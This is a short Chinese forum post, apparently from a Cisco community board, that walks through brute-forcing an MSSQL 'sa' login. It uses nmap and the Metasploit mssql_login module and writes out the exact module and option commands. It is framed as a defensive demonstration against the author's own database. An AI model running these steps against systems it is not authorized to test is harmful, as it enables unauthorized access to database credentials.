请选择 进入手机版 | 继续访问电脑版

设为首页 收藏本站
思科社区 关注
思科社区

  思科 CCO 登录 推荐
 找回密码
 立即注册

搜索
热搜: 邮件服务器
查看: 200|回复: 1

【原创】浅谈一个MSSQL 暴力破击攻击

[复制链接]
发表于 2019-3-6 23:21:09 | 显示全部楼层 |阅读模式
聊安全,简单讲述一个MSSQL 暴力破击攻击,也为做安全的提供点简单的攻防思路。

很多时候攻击者混入内网,第一步就是扫描有价值的信息,我们这里用常用kali, 通过kali自带msf平台对自己的MSSQL数据库进行暴力破解攻击,最终获取真实密码。



第一步: nmap 扫描可用信息

Nmap扫描有使用1433 端口的主机,猜测是MSSQL,开始针对性尝试攻击


第二步:查找MSSQL 可用攻击工具



search mssql

使用MSSQL_login  攻击
use auxiliary/scanner/mssql/mssql_login

第三步:
showoption 查看参数,填写必填项目,增加字典


set rhosts 10.10.100.139    配置目标攻击主机IPset threads 10   设置扫描线程(加速)set PASS_FILE /home/pass1.txt  配置使用字典路径set USERNAME sa    配置常用MSSQL 账号

因为一般情况下MSSQL  默认账户都是SA ,所以配置上去,主机IP 已经扫描出来了

第四步: run   

当然这里有人说了,这里密码破解是不是太容易了,这里只是演示效果啊,还是很多弱密码的情况,可以用字典生成器生成X位的字典;

懂套路才懂防护,希望对大家有所帮助。



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
  • 1
  • 2
  • 3
  • 4
  • 5
  • 1
  • 2
  • 3
  • 4
  • 5
平均得分5 (2 评价)
发表于 2019-3-8 21:35:25 | 显示全部楼层
谢谢版主分享,好东西,咨询一下有什么好的字典生成工具呢?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 1
  • 2
  • 3
  • 4
  • 5
平均得分0 (0 评价)
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver | 思科社区  

GMT+8, 2019-3-19 17:08 , Processed in 0.089177 second(s), 35 queries .

京ICP备09041801号-187

版权所有 :copyright:1992-2019 思科系统  重要声明 | 保密声明 | 隐私权政策 | 商标 |

快速回复 返回顶部 返回列表